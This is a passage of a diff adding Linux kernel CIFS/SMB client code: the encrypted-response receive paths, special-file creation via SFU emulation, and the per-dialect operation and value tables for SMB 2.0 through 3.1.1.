++			      pages, npages, len, false);
++	if (rc)
++		goto free_pages;
++
++	*mid = smb2_find_mid(server, buf);
++	if (*mid == NULL)
++		cifs_dbg(FYI, "mid not found\n");
++	else {
++		cifs_dbg(FYI, "mid found\n");
++		(*mid)->decrypted = true;
++		rc = handle_read_data(server, *mid, buf,
++				      server->vals->read_rsp_size,
++				      pages, npages, len, false);
++		if (rc >= 0) {
++			if (server->ops->is_network_name_deleted) {
++				server->ops->is_network_name_deleted(buf,
++								server);
++			}
++		}
++	}
++
++free_pages:
++	for (i = i - 1; i >= 0; i--)
++		put_page(pages[i]);
++	kfree(pages);
++	return rc;
++discard_data:
++	cifs_discard_remaining_data(server);
++	goto free_pages;
++}
++
++static int
++receive_encrypted_standard(struct TCP_Server_Info *server,
++			   struct mid_q_entry **mids, char **bufs,
++			   int *num_mids)
++{
++	int ret, length;
++	char *buf = server->smallbuf;
++	struct smb2_hdr *shdr;
++	unsigned int pdu_length = server->pdu_size;
++	unsigned int buf_size;
++	struct mid_q_entry *mid_entry;
++	int next_is_large;
++	char *next_buffer = NULL;
++
++	*num_mids = 0;
++
++	/* switch to large buffer if too big for a small one */
++	if (pdu_length > MAX_CIFS_SMALL_BUFFER_SIZE) {
++		server->large_buf = true;
++		memcpy(server->bigbuf, buf, server->total_read);
++		buf = server->bigbuf;
++	}
++
++	/* now read the rest */
++	length = cifs_read_from_socket(server, buf + HEADER_SIZE(server) - 1,
++				pdu_length - HEADER_SIZE(server) + 1);
++	if (length < 0)
++		return length;
++	server->total_read += length;
++
++	buf_size = pdu_length - sizeof(struct smb2_transform_hdr);
++	length = decrypt_raw_data(server, buf, buf_size, NULL, 0, 0, false);
++	if (length)
++		return length;
++
++	next_is_large = server->large_buf;
++one_more:
++	shdr = (struct smb2_hdr *)buf;
++	if (shdr->NextCommand) {
++		if (next_is_large)
++			next_buffer = (char *)cifs_buf_get();
++		else
++			next_buffer = (char *)cifs_small_buf_get();
++		memcpy(next_buffer,
++		       buf + le32_to_cpu(shdr->NextCommand),
++		       pdu_length - le32_to_cpu(shdr->NextCommand));
++	}
++
++	mid_entry = smb2_find_mid(server, buf);
++	if (mid_entry == NULL)
++		cifs_dbg(FYI, "mid not found\n");
++	else {
++		cifs_dbg(FYI, "mid found\n");
++		mid_entry->decrypted = true;
++		mid_entry->resp_buf_size = server->pdu_size;
++	}
++
++	if (*num_mids >= MAX_COMPOUND) {
++		cifs_server_dbg(VFS, "too many PDUs in compound\n");
++		return -1;
++	}
++	bufs[*num_mids] = buf;
++	mids[(*num_mids)++] = mid_entry;
++
++	if (mid_entry && mid_entry->handle)
++		ret = mid_entry->handle(server, mid_entry);
++	else
++		ret = cifs_handle_standard(server, mid_entry);
++
++	if (ret == 0 && shdr->NextCommand) {
++		pdu_length -= le32_to_cpu(shdr->NextCommand);
++		server->large_buf = next_is_large;
++		if (next_is_large)
++			server->bigbuf = buf = next_buffer;
++		else
++			server->smallbuf = buf = next_buffer;
++		goto one_more;
++	} else if (ret != 0) {
++		/*
++		 * ret != 0 here means that we didn't get to handle_mid() thus
++		 * server->smallbuf and server->bigbuf are still valid. We need
++		 * to free next_buffer because it is not going to be used
++		 * anywhere.
++		 */
++		if (next_is_large)
++			free_rsp_buf(CIFS_LARGE_BUFFER, next_buffer);
++		else
++			free_rsp_buf(CIFS_SMALL_BUFFER, next_buffer);
++	}
++
++	return ret;
++}
++
++static int
++smb3_receive_transform(struct TCP_Server_Info *server,
++		       struct mid_q_entry **mids, char **bufs, int *num_mids)
++{
++	char *buf = server->smallbuf;
++	unsigned int pdu_length = server->pdu_size;
++	struct smb2_transform_hdr *tr_hdr = (struct smb2_transform_hdr *)buf;
++	unsigned int orig_len = le32_to_cpu(tr_hdr->OriginalMessageSize);
++
++	if (pdu_length < sizeof(struct smb2_transform_hdr) +
++						sizeof(struct smb2_hdr)) {
++		cifs_server_dbg(VFS, "Transform message is too small (%u)\n",
++			 pdu_length);
++		cifs_reconnect(server, true);
++		return -ECONNABORTED;
++	}
++
++	if (pdu_length < orig_len + sizeof(struct smb2_transform_hdr)) {
++		cifs_server_dbg(VFS, "Transform message is broken\n");
++		cifs_reconnect(server, true);
++		return -ECONNABORTED;
++	}
++
++	/* TODO: add support for compounds containing READ. */
++	if (pdu_length > CIFSMaxBufSize + MAX_HEADER_SIZE(server)) {
++		return receive_encrypted_read(server, &mids[0], num_mids);
++	}
++
++	return receive_encrypted_standard(server, mids, bufs, num_mids);
++}
++
++int
++smb3_handle_read_data(struct TCP_Server_Info *server, struct mid_q_entry *mid)
++{
++	char *buf = server->large_buf ? server->bigbuf : server->smallbuf;
++
++	return handle_read_data(server, mid, buf, server->pdu_size,
++				NULL, 0, 0, false);
++}
++
++static int
++smb2_next_header(char *buf)
++{
++	struct smb2_hdr *hdr = (struct smb2_hdr *)buf;
++	struct smb2_transform_hdr *t_hdr = (struct smb2_transform_hdr *)buf;
++
++	if (hdr->ProtocolId == SMB2_TRANSFORM_PROTO_NUM)
++		return sizeof(struct smb2_transform_hdr) +
++		  le32_to_cpu(t_hdr->OriginalMessageSize);
++
++	return le32_to_cpu(hdr->NextCommand);
++}
++
++static int
++smb2_make_node(unsigned int xid, struct inode *inode,
++	       struct dentry *dentry, struct cifs_tcon *tcon,
++	       const char *full_path, umode_t mode, dev_t dev)
++{
++	struct cifs_sb_info *cifs_sb = CIFS_SB(inode->i_sb);
++	int rc = -EPERM;
++	struct cifs_open_info_data buf = {};
++	struct cifs_io_parms io_parms = {0};
++	__u32 oplock = 0;
++	struct cifs_fid fid;
++	struct cifs_open_parms oparms;
++	unsigned int bytes_written;
++	struct win_dev *pdev;
++	struct kvec iov[2];
++
++	/*
++	 * Check if mounted with mount parm 'sfu' mount parm.
++	 * SFU emulation should work with all servers, but only
++	 * supports block and char device (no socket & fifo),
++	 * and was used by default in earlier versions of Windows
++	 */
++	if (!(cifs_sb->mnt_cifs_flags & CIFS_MOUNT_UNX_EMUL))
++		return rc;
++
++	/*
++	 * TODO: Add ability to create instead via reparse point. Windows (e.g.
++	 * their current NFS server) uses this approach to expose special files
++	 * over SMB2/SMB3 and Samba will do this with SMB3.1.1 POSIX Extensions
++	 */
++
++	if (!S_ISCHR(mode) && !S_ISBLK(mode))
++		return rc;
++
++	cifs_dbg(FYI, "sfu compat create special file\n");
++
++	oparms = (struct cifs_open_parms) {
++		.tcon = tcon,
++		.cifs_sb = cifs_sb,
++		.desired_access = GENERIC_WRITE,
++		.create_options = cifs_create_options(cifs_sb, CREATE_NOT_DIR |
++						      CREATE_OPTION_SPECIAL),
++		.disposition = FILE_CREATE,
++		.path = full_path,
++		.fid = &fid,
++	};
++
++	if (tcon->ses->server->oplocks)
++		oplock = REQ_OPLOCK;
++	else
++		oplock = 0;
++	rc = tcon->ses->server->ops->open(xid, &oparms, &oplock, &buf);
++	if (rc)
++		return rc;
++
++	/*
++	 * BB Do not bother to decode buf since no local inode yet to put
++	 * timestamps in, but we can reuse it safely.
++	 */
++
++	pdev = (struct win_dev *)&buf.fi;
++	io_parms.pid = current->tgid;
++	io_parms.tcon = tcon;
++	io_parms.offset = 0;
++	io_parms.length = sizeof(struct win_dev);
++	iov[1].iov_base = &buf.fi;
++	iov[1].iov_len = sizeof(struct win_dev);
++	if (S_ISCHR(mode)) {
++		memcpy(pdev->type, "IntxCHR", 8);
++		pdev->major = cpu_to_le64(MAJOR(dev));
++		pdev->minor = cpu_to_le64(MINOR(dev));
++		rc = tcon->ses->server->ops->sync_write(xid, &fid, &io_parms,
++							&bytes_written, iov, 1);
++	} else if (S_ISBLK(mode)) {
++		memcpy(pdev->type, "IntxBLK", 8);
++		pdev->major = cpu_to_le64(MAJOR(dev));
++		pdev->minor = cpu_to_le64(MINOR(dev));
++		rc = tcon->ses->server->ops->sync_write(xid, &fid, &io_parms,
++							&bytes_written, iov, 1);
++	}
++	tcon->ses->server->ops->close(xid, tcon, &fid);
++	d_drop(dentry);
++
++	/* FIXME: add code here to set EAs */
++
++	cifs_free_open_info(&buf);
++	return rc;
++}
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++struct smb_version_operations smb20_operations = {
++	.compare_fids = smb2_compare_fids,
++	.setup_request = smb2_setup_request,
++	.setup_async_request = smb2_setup_async_request,
++	.check_receive = smb2_check_receive,
++	.add_credits = smb2_add_credits,
++	.set_credits = smb2_set_credits,
++	.get_credits_field = smb2_get_credits_field,
++	.get_credits = smb2_get_credits,
++	.wait_mtu_credits = cifs_wait_mtu_credits,
++	.get_next_mid = smb2_get_next_mid,
++	.revert_current_mid = smb2_revert_current_mid,
++	.read_data_offset = smb2_read_data_offset,
++	.read_data_length = smb2_read_data_length,
++	.map_error = map_smb2_to_linux_error,
++	.find_mid = smb2_find_mid,
++	.check_message = smb2_check_message,
++	.dump_detail = smb2_dump_detail,
++	.clear_stats = smb2_clear_stats,
++	.print_stats = smb2_print_stats,
++	.is_oplock_break = smb2_is_valid_oplock_break,
++	.handle_cancelled_mid = smb2_handle_cancelled_mid,
++	.downgrade_oplock = smb2_downgrade_oplock,
++	.need_neg = smb2_need_neg,
++	.negotiate = smb2_negotiate,
++	.negotiate_wsize = smb2_negotiate_wsize,
++	.negotiate_rsize = smb2_negotiate_rsize,
++	.sess_setup = SMB2_sess_setup,
++	.logoff = SMB2_logoff,
++	.tree_connect = SMB2_tcon,
++	.tree_disconnect = SMB2_tdis,
++	.qfs_tcon = smb2_qfs_tcon,
++	.is_path_accessible = smb2_is_path_accessible,
++	.can_echo = smb2_can_echo,
++	.echo = SMB2_echo,
++	.query_path_info = smb2_query_path_info,
++	.get_srv_inum = smb2_get_srv_inum,
++	.query_file_info = smb2_query_file_info,
++	.set_path_size = smb2_set_path_size,
++	.set_file_size = smb2_set_file_size,
++	.set_file_info = smb2_set_file_info,
++	.set_compression = smb2_set_compression,
++	.mkdir = smb2_mkdir,
++	.mkdir_setinfo = smb2_mkdir_setinfo,
++	.rmdir = smb2_rmdir,
++	.unlink = smb2_unlink,
++	.rename = smb2_rename_path,
++	.create_hardlink = smb2_create_hardlink,
++	.query_symlink = smb2_query_symlink,
++	.query_mf_symlink = smb3_query_mf_symlink,
++	.create_mf_symlink = smb3_create_mf_symlink,
++	.open = smb2_open_file,
++	.set_fid = smb2_set_fid,
++	.close = smb2_close_file,
++	.flush = smb2_flush_file,
++	.async_readv = smb2_async_readv,
++	.async_writev = smb2_async_writev,
++	.sync_read = smb2_sync_read,
++	.sync_write = smb2_sync_write,
++	.query_dir_first = smb2_query_dir_first,
++	.query_dir_next = smb2_query_dir_next,
++	.close_dir = smb2_close_dir,
++	.calc_smb_size = smb2_calc_size,
++	.is_status_pending = smb2_is_status_pending,
++	.is_session_expired = smb2_is_session_expired,
++	.oplock_response = smb2_oplock_response,
++	.queryfs = smb2_queryfs,
++	.mand_lock = smb2_mand_lock,
++	.mand_unlock_range = smb2_unlock_range,
++	.push_mand_locks = smb2_push_mandatory_locks,
++	.get_lease_key = smb2_get_lease_key,
++	.set_lease_key = smb2_set_lease_key,
++	.new_lease_key = smb2_new_lease_key,
++	.calc_signature = smb2_calc_signature,
++	.is_read_op = smb2_is_read_op,
++	.set_oplock_level = smb2_set_oplock_level,
++	.create_lease_buf = smb2_create_lease_buf,
++	.parse_lease_buf = smb2_parse_lease_buf,
++	.copychunk_range = smb2_copychunk_range,
++	.wp_retry_size = smb2_wp_retry_size,
++	.dir_needs_close = smb2_dir_needs_close,
++	.get_dfs_refer = smb2_get_dfs_refer,
++	.select_sectype = smb2_select_sectype,
++#ifdef CONFIG_CIFS_XATTR
++	.query_all_EAs = smb2_query_eas,
++	.set_EA = smb2_set_ea,
++#endif /* CIFS_XATTR */
++	.get_acl = get_smb2_acl,
++	.get_acl_by_fid = get_smb2_acl_by_fid,
++	.set_acl = set_smb2_acl,
++	.next_header = smb2_next_header,
++	.ioctl_query_info = smb2_ioctl_query_info,
++	.make_node = smb2_make_node,
++	.fiemap = smb3_fiemap,
++	.llseek = smb3_llseek,
++	.is_status_io_timeout = smb2_is_status_io_timeout,
++	.is_network_name_deleted = smb2_is_network_name_deleted,
++};
++#endif /* CIFS_ALLOW_INSECURE_LEGACY */
++
++struct smb_version_operations smb21_operations = {
++	.compare_fids = smb2_compare_fids,
++	.setup_request = smb2_setup_request,
++	.setup_async_request = smb2_setup_async_request,
++	.check_receive = smb2_check_receive,
++	.add_credits = smb2_add_credits,
++	.set_credits = smb2_set_credits,
++	.get_credits_field = smb2_get_credits_field,
++	.get_credits = smb2_get_credits,
++	.wait_mtu_credits = smb2_wait_mtu_credits,
++	.adjust_credits = smb2_adjust_credits,
++	.get_next_mid = smb2_get_next_mid,
++	.revert_current_mid = smb2_revert_current_mid,
++	.read_data_offset = smb2_read_data_offset,
++	.read_data_length = smb2_read_data_length,
++	.map_error = map_smb2_to_linux_error,
++	.find_mid = smb2_find_mid,
++	.check_message = smb2_check_message,
++	.dump_detail = smb2_dump_detail,
++	.clear_stats = smb2_clear_stats,
++	.print_stats = smb2_print_stats,
++	.is_oplock_break = smb2_is_valid_oplock_break,
++	.handle_cancelled_mid = smb2_handle_cancelled_mid,
++	.downgrade_oplock = smb2_downgrade_oplock,
++	.need_neg = smb2_need_neg,
++	.negotiate = smb2_negotiate,
++	.negotiate_wsize = smb2_negotiate_wsize,
++	.negotiate_rsize = smb2_negotiate_rsize,
++	.sess_setup = SMB2_sess_setup,
++	.logoff = SMB2_logoff,
++	.tree_connect = SMB2_tcon,
++	.tree_disconnect = SMB2_tdis,
++	.qfs_tcon = smb2_qfs_tcon,
++	.is_path_accessible = smb2_is_path_accessible,
++	.can_echo = smb2_can_echo,
++	.echo = SMB2_echo,
++	.query_path_info = smb2_query_path_info,
++	.get_srv_inum = smb2_get_srv_inum,
++	.query_file_info = smb2_query_file_info,
++	.set_path_size = smb2_set_path_size,
++	.set_file_size = smb2_set_file_size,
++	.set_file_info = smb2_set_file_info,
++	.set_compression = smb2_set_compression,
++	.mkdir = smb2_mkdir,
++	.mkdir_setinfo = smb2_mkdir_setinfo,
++	.rmdir = smb2_rmdir,
++	.unlink = smb2_unlink,
++	.rename = smb2_rename_path,
++	.create_hardlink = smb2_create_hardlink,
++	.query_symlink = smb2_query_symlink,
++	.query_mf_symlink = smb3_query_mf_symlink,
++	.create_mf_symlink = smb3_create_mf_symlink,
++	.open = smb2_open_file,
++	.set_fid = smb2_set_fid,
++	.close = smb2_close_file,
++	.flush = smb2_flush_file,
++	.async_readv = smb2_async_readv,
++	.async_writev = smb2_async_writev,
++	.sync_read = smb2_sync_read,
++	.sync_write = smb2_sync_write,
++	.query_dir_first = smb2_query_dir_first,
++	.query_dir_next = smb2_query_dir_next,
++	.close_dir = smb2_close_dir,
++	.calc_smb_size = smb2_calc_size,
++	.is_status_pending = smb2_is_status_pending,
++	.is_session_expired = smb2_is_session_expired,
++	.oplock_response = smb2_oplock_response,
++	.queryfs = smb2_queryfs,
++	.mand_lock = smb2_mand_lock,
++	.mand_unlock_range = smb2_unlock_range,
++	.push_mand_locks = smb2_push_mandatory_locks,
++	.get_lease_key = smb2_get_lease_key,
++	.set_lease_key = smb2_set_lease_key,
++	.new_lease_key = smb2_new_lease_key,
++	.calc_signature = smb2_calc_signature,
++	.is_read_op = smb21_is_read_op,
++	.set_oplock_level = smb21_set_oplock_level,
++	.create_lease_buf = smb2_create_lease_buf,
++	.parse_lease_buf = smb2_parse_lease_buf,
++	.copychunk_range = smb2_copychunk_range,
++	.wp_retry_size = smb2_wp_retry_size,
++	.dir_needs_close = smb2_dir_needs_close,
++	.enum_snapshots = smb3_enum_snapshots,
++	.notify = smb3_notify,
++	.get_dfs_refer = smb2_get_dfs_refer,
++	.select_sectype = smb2_select_sectype,
++#ifdef CONFIG_CIFS_XATTR
++	.query_all_EAs = smb2_query_eas,
++	.set_EA = smb2_set_ea,
++#endif /* CIFS_XATTR */
++	.get_acl = get_smb2_acl,
++	.get_acl_by_fid = get_smb2_acl_by_fid,
++	.set_acl = set_smb2_acl,
++	.next_header = smb2_next_header,
++	.ioctl_query_info = smb2_ioctl_query_info,
++	.make_node = smb2_make_node,
++	.fiemap = smb3_fiemap,
++	.llseek = smb3_llseek,
++	.is_status_io_timeout = smb2_is_status_io_timeout,
++	.is_network_name_deleted = smb2_is_network_name_deleted,
++};
++
++struct smb_version_operations smb30_operations = {
++	.compare_fids = smb2_compare_fids,
++	.setup_request = smb2_setup_request,
++	.setup_async_request = smb2_setup_async_request,
++	.check_receive = smb2_check_receive,
++	.add_credits = smb2_add_credits,
++	.set_credits = smb2_set_credits,
++	.get_credits_field = smb2_get_credits_field,
++	.get_credits = smb2_get_credits,
++	.wait_mtu_credits = smb2_wait_mtu_credits,
++	.adjust_credits = smb2_adjust_credits,
++	.get_next_mid = smb2_get_next_mid,
++	.revert_current_mid = smb2_revert_current_mid,
++	.read_data_offset = smb2_read_data_offset,
++	.read_data_length = smb2_read_data_length,
++	.map_error = map_smb2_to_linux_error,
++	.find_mid = smb2_find_mid,
++	.check_message = smb2_check_message,
++	.dump_detail = smb2_dump_detail,
++	.clear_stats = smb2_clear_stats,
++	.print_stats = smb2_print_stats,
++	.dump_share_caps = smb2_dump_share_caps,
++	.is_oplock_break = smb2_is_valid_oplock_break,
++	.handle_cancelled_mid = smb2_handle_cancelled_mid,
++	.downgrade_oplock = smb3_downgrade_oplock,
++	.need_neg = smb2_need_neg,
++	.negotiate = smb2_negotiate,
++	.negotiate_wsize = smb3_negotiate_wsize,
++	.negotiate_rsize = smb3_negotiate_rsize,
++	.sess_setup = SMB2_sess_setup,
++	.logoff = SMB2_logoff,
++	.tree_connect = SMB2_tcon,
++	.tree_disconnect = SMB2_tdis,
++	.qfs_tcon = smb3_qfs_tcon,
++	.is_path_accessible = smb2_is_path_accessible,
++	.can_echo = smb2_can_echo,
++	.echo = SMB2_echo,
++	.query_path_info = smb2_query_path_info,
++	/* WSL tags introduced long after smb2.1, enable for SMB3, 3.11 only */
++	.query_reparse_tag = smb2_query_reparse_tag,
++	.get_srv_inum = smb2_get_srv_inum,
++	.query_file_info = smb2_query_file_info,
++	.set_path_size = smb2_set_path_size,
++	.set_file_size = smb2_set_file_size,
++	.set_file_info = smb2_set_file_info,
++	.set_compression = smb2_set_compression,
++	.mkdir = smb2_mkdir,
++	.mkdir_setinfo = smb2_mkdir_setinfo,
++	.rmdir = smb2_rmdir,
++	.unlink = smb2_unlink,
++	.rename = smb2_rename_path,
++	.create_hardlink = smb2_create_hardlink,
++	.query_symlink = smb2_query_symlink,
++	.query_mf_symlink = smb3_query_mf_symlink,
++	.create_mf_symlink = smb3_create_mf_symlink,
++	.open = smb2_open_file,
++	.set_fid = smb2_set_fid,
++	.close = smb2_close_file,
++	.close_getattr = smb2_close_getattr,
++	.flush = smb2_flush_file,
++	.async_readv = smb2_async_readv,
++	.async_writev = smb2_async_writev,
++	.sync_read = smb2_sync_read,
++	.sync_write = smb2_sync_write,
++	.query_dir_first = smb2_query_dir_first,
++	.query_dir_next = smb2_query_dir_next,
++	.close_dir = smb2_close_dir,
++	.calc_smb_size = smb2_calc_size,
++	.is_status_pending = smb2_is_status_pending,
++	.is_session_expired = smb2_is_session_expired,
++	.oplock_response = smb2_oplock_response,
++	.queryfs = smb2_queryfs,
++	.mand_lock = smb2_mand_lock,
++	.mand_unlock_range = smb2_unlock_range,
++	.push_mand_locks = smb2_push_mandatory_locks,
++	.get_lease_key = smb2_get_lease_key,
++	.set_lease_key = smb2_set_lease_key,
++	.new_lease_key = smb2_new_lease_key,
++	.generate_signingkey = generate_smb30signingkey,
++	.calc_signature = smb3_calc_signature,
++	.set_integrity  = smb3_set_integrity,
++	.is_read_op = smb21_is_read_op,
++	.set_oplock_level = smb3_set_oplock_level,
++	.create_lease_buf = smb3_create_lease_buf,
++	.parse_lease_buf = smb3_parse_lease_buf,
++	.copychunk_range = smb2_copychunk_range,
++	.duplicate_extents = smb2_duplicate_extents,
++	.validate_negotiate = smb3_validate_negotiate,
++	.wp_retry_size = smb2_wp_retry_size,
++	.dir_needs_close = smb2_dir_needs_close,
++	.fallocate = smb3_fallocate,
++	.enum_snapshots = smb3_enum_snapshots,
++	.notify = smb3_notify,
++	.init_transform_rq = smb3_init_transform_rq,
++	.is_transform_hdr = smb3_is_transform_hdr,
++	.receive_transform = smb3_receive_transform,
++	.get_dfs_refer = smb2_get_dfs_refer,
++	.select_sectype = smb2_select_sectype,
++#ifdef CONFIG_CIFS_XATTR
++	.query_all_EAs = smb2_query_eas,
++	.set_EA = smb2_set_ea,
++#endif /* CIFS_XATTR */
++	.get_acl = get_smb2_acl,
++	.get_acl_by_fid = get_smb2_acl_by_fid,
++	.set_acl = set_smb2_acl,
++	.next_header = smb2_next_header,
++	.ioctl_query_info = smb2_ioctl_query_info,
++	.make_node = smb2_make_node,
++	.fiemap = smb3_fiemap,
++	.llseek = smb3_llseek,
++	.is_status_io_timeout = smb2_is_status_io_timeout,
++	.is_network_name_deleted = smb2_is_network_name_deleted,
++};
++
++struct smb_version_operations smb311_operations = {
++	.compare_fids = smb2_compare_fids,
++	.setup_request = smb2_setup_request,
++	.setup_async_request = smb2_setup_async_request,
++	.check_receive = smb2_check_receive,
++	.add_credits = smb2_add_credits,
++	.set_credits = smb2_set_credits,
++	.get_credits_field = smb2_get_credits_field,
++	.get_credits = smb2_get_credits,
++	.wait_mtu_credits = smb2_wait_mtu_credits,
++	.adjust_credits = smb2_adjust_credits,
++	.get_next_mid = smb2_get_next_mid,
++	.revert_current_mid = smb2_revert_current_mid,
++	.read_data_offset = smb2_read_data_offset,
++	.read_data_length = smb2_read_data_length,
++	.map_error = map_smb2_to_linux_error,
++	.find_mid = smb2_find_mid,
++	.check_message = smb2_check_message,
++	.dump_detail = smb2_dump_detail,
++	.clear_stats = smb2_clear_stats,
++	.print_stats = smb2_print_stats,
++	.dump_share_caps = smb2_dump_share_caps,
++	.is_oplock_break = smb2_is_valid_oplock_break,
++	.handle_cancelled_mid = smb2_handle_cancelled_mid,
++	.downgrade_oplock = smb3_downgrade_oplock,
++	.need_neg = smb2_need_neg,
++	.negotiate = smb2_negotiate,
++	.negotiate_wsize = smb3_negotiate_wsize,
++	.negotiate_rsize = smb3_negotiate_rsize,
++	.sess_setup = SMB2_sess_setup,
++	.logoff = SMB2_logoff,
++	.tree_connect = SMB2_tcon,
++	.tree_disconnect = SMB2_tdis,
++	.qfs_tcon = smb3_qfs_tcon,
++	.is_path_accessible = smb2_is_path_accessible,
++	.can_echo = smb2_can_echo,
++	.echo = SMB2_echo,
++	.query_path_info = smb2_query_path_info,
++	.query_reparse_tag = smb2_query_reparse_tag,
++	.get_srv_inum = smb2_get_srv_inum,
++	.query_file_info = smb2_query_file_info,
++	.set_path_size = smb2_set_path_size,
++	.set_file_size = smb2_set_file_size,
++	.set_file_info = smb2_set_file_info,
++	.set_compression = smb2_set_compression,
++	.mkdir = smb2_mkdir,
++	.mkdir_setinfo = smb2_mkdir_setinfo,
++	.posix_mkdir = smb311_posix_mkdir,
++	.rmdir = smb2_rmdir,
++	.unlink = smb2_unlink,
++	.rename = smb2_rename_path,
++	.create_hardlink = smb2_create_hardlink,
++	.query_symlink = smb2_query_symlink,
++	.query_mf_symlink = smb3_query_mf_symlink,
++	.create_mf_symlink = smb3_create_mf_symlink,
++	.open = smb2_open_file,
++	.set_fid = smb2_set_fid,
++	.close = smb2_close_file,
++	.close_getattr = smb2_close_getattr,
++	.flush = smb2_flush_file,
++	.async_readv = smb2_async_readv,
++	.async_writev = smb2_async_writev,
++	.sync_read = smb2_sync_read,
++	.sync_write = smb2_sync_write,
++	.query_dir_first = smb2_query_dir_first,
++	.query_dir_next = smb2_query_dir_next,
++	.close_dir = smb2_close_dir,
++	.calc_smb_size = smb2_calc_size,
++	.is_status_pending = smb2_is_status_pending,
++	.is_session_expired = smb2_is_session_expired,
++	.oplock_response = smb2_oplock_response,
++	.queryfs = smb311_queryfs,
++	.mand_lock = smb2_mand_lock,
++	.mand_unlock_range = smb2_unlock_range,
++	.push_mand_locks = smb2_push_mandatory_locks,
++	.get_lease_key = smb2_get_lease_key,
++	.set_lease_key = smb2_set_lease_key,
++	.new_lease_key = smb2_new_lease_key,
++	.generate_signingkey = generate_smb311signingkey,
++	.calc_signature = smb3_calc_signature,
++	.set_integrity  = smb3_set_integrity,
++	.is_read_op = smb21_is_read_op,
++	.set_oplock_level = smb3_set_oplock_level,
++	.create_lease_buf = smb3_create_lease_buf,
++	.parse_lease_buf = smb3_parse_lease_buf,
++	.copychunk_range = smb2_copychunk_range,
++	.duplicate_extents = smb2_duplicate_extents,
++/*	.validate_negotiate = smb3_validate_negotiate, */ /* not used in 3.11 */
++	.wp_retry_size = smb2_wp_retry_size,
++	.dir_needs_close = smb2_dir_needs_close,
++	.fallocate = smb3_fallocate,
++	.enum_snapshots = smb3_enum_snapshots,
++	.notify = smb3_notify,
++	.init_transform_rq = smb3_init_transform_rq,
++	.is_transform_hdr = smb3_is_transform_hdr,
++	.receive_transform = smb3_receive_transform,
++	.get_dfs_refer = smb2_get_dfs_refer,
++	.select_sectype = smb2_select_sectype,
++#ifdef CONFIG_CIFS_XATTR
++	.query_all_EAs = smb2_query_eas,
++	.set_EA = smb2_set_ea,
++#endif /* CIFS_XATTR */
++	.get_acl = get_smb2_acl,
++	.get_acl_by_fid = get_smb2_acl_by_fid,
++	.set_acl = set_smb2_acl,
++	.next_header = smb2_next_header,
++	.ioctl_query_info = smb2_ioctl_query_info,
++	.make_node = smb2_make_node,
++	.fiemap = smb3_fiemap,
++	.llseek = smb3_llseek,
++	.is_status_io_timeout = smb2_is_status_io_timeout,
++	.is_network_name_deleted = smb2_is_network_name_deleted,
++};
++
++#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
++struct smb_version_values smb20_values = {
++	.version_string = SMB20_VERSION_STRING,
++	.protocol_id = SMB20_PROT_ID,
++	.req_capabilities = 0, /* MBZ */
++	.large_lock_type = 0,
++	.exclusive_lock_type = SMB2_LOCKFLAG_EXCLUSIVE,
++	.shared_lock_type = SMB2_LOCKFLAG_SHARED,
++	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
++	.header_size = sizeof(struct smb2_hdr),
++	.header_preamble_size = 0,
++	.max_header_size = MAX_SMB2_HDR_SIZE,
++	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
++	.lock_cmd = SMB2_LOCK,
++	.cap_unix = 0,
++	.cap_nt_find = SMB2_NT_FIND,
++	.cap_large_files = SMB2_LARGE_FILES,
++	.signing_enabled = SMB2_NEGOTIATE_SIGNING_ENABLED | SMB2_NEGOTIATE_SIGNING_REQUIRED,
++	.signing_required = SMB2_NEGOTIATE_SIGNING_REQUIRED,
++	.create_lease_size = sizeof(struct create_lease),
++};
++#endif /* ALLOW_INSECURE_LEGACY */
++
++struct smb_version_values smb21_values = {
++	.version_string = SMB21_VERSION_STRING,
++	.protocol_id = SMB21_PROT_ID,
++	.req_capabilities = 0, /* MBZ on negotiate req until SMB3 dialect */
++	.large_lock_type = 0,
++	.exclusive_lock_type = SMB2_LOCKFLAG_EXCLUSIVE,
++	.shared_lock_type = SMB2_LOCKFLAG_SHARED,
++	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
++	.header_size = sizeof(struct smb2_hdr),
++	.header_preamble_size = 0,
++	.max_header_size = MAX_SMB2_HDR_SIZE,
++	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
++	.lock_cmd = SMB2_LOCK,
++	.cap_unix = 0,
++	.cap_nt_find = SMB2_NT_FIND,
++	.cap_large_files = SMB2_LARGE_FILES,
++	.signing_enabled = SMB2_NEGOTIATE_SIGNING_ENABLED | SMB2_NEGOTIATE_SIGNING_REQUIRED,
++	.signing_required = SMB2_NEGOTIATE_SIGNING_REQUIRED,
++	.create_lease_size = sizeof(struct create_lease),
++};
++
++struct smb_version_values smb3any_values = {
++	.version_string = SMB3ANY_VERSION_STRING,
++	.protocol_id = SMB302_PROT_ID, /* doesn't matter, send protocol array */
++	.req_capabilities = SMB2_GLOBAL_CAP_DFS | SMB2_GLOBAL_CAP_LEASING | SMB2_GLOBAL_CAP_LARGE_MTU | SMB2_GLOBAL_CAP_PERSISTENT_HANDLES | SMB2_GLOBAL_CAP_ENCRYPTION | SMB2_GLOBAL_CAP_DIRECTORY_LEASING,
++	.large_lock_type = 0,
++	.exclusive_lock_type = SMB2_LOCKFLAG_EXCLUSIVE,
++	.shared_lock_type = SMB2_LOCKFLAG_SHARED,
++	.unlock_lock_type = SMB2_LOCKFLAG_UNLOCK,
++	.header_size = sizeof(struct smb2_hdr),
++	.header_preamble_size = 0,
++	.max_header_size = MAX_SMB2_HDR_SIZE,
++	.read_rsp_size = sizeof(struct smb2_read_rsp) - 1,
++	.lock_cmd = SMB2_LOCK,
++	.cap_unix = 0,
++	.cap_nt_find = SMB2_NT_FIND,
++	.cap_large_files = SMB2_LARGE_FILES,
++	.signing_enabled = SMB2_NEGOTIATE_SIGNING_ENABLED | SMB2_NEGOTIATE_SIGNING_REQUIRED,
++	.signing_required = SMB2_NEGOTIATE_SIGNING_REQUIRED,
++	.create_lease_size = sizeof(struct create_lease_v2),
++};
++
++struct smb_version_values smbdefault_values = {
++	.version_string = SMBDEFAULT_VERSION_STRING,
++	.protocol_id = SMB302_PROT_ID, /* doesn't matter, send protocol array */
++	.req_capabilities = SMB2_GLOBAL_CAP_DFS | SMB2_GLOBAL_CAP_LEASING | SMB2_GLOBAL_CAP_LARGE_MTU | SMB2_GLOBAL_CAP_PERSISTENT_HANDLES | SMB2_GLOBAL_CAP_ENCRYPTION | SMB2_GLOBAL_CAP_DIRECTORY_LEASING,
++	.large_lock_type = 0,
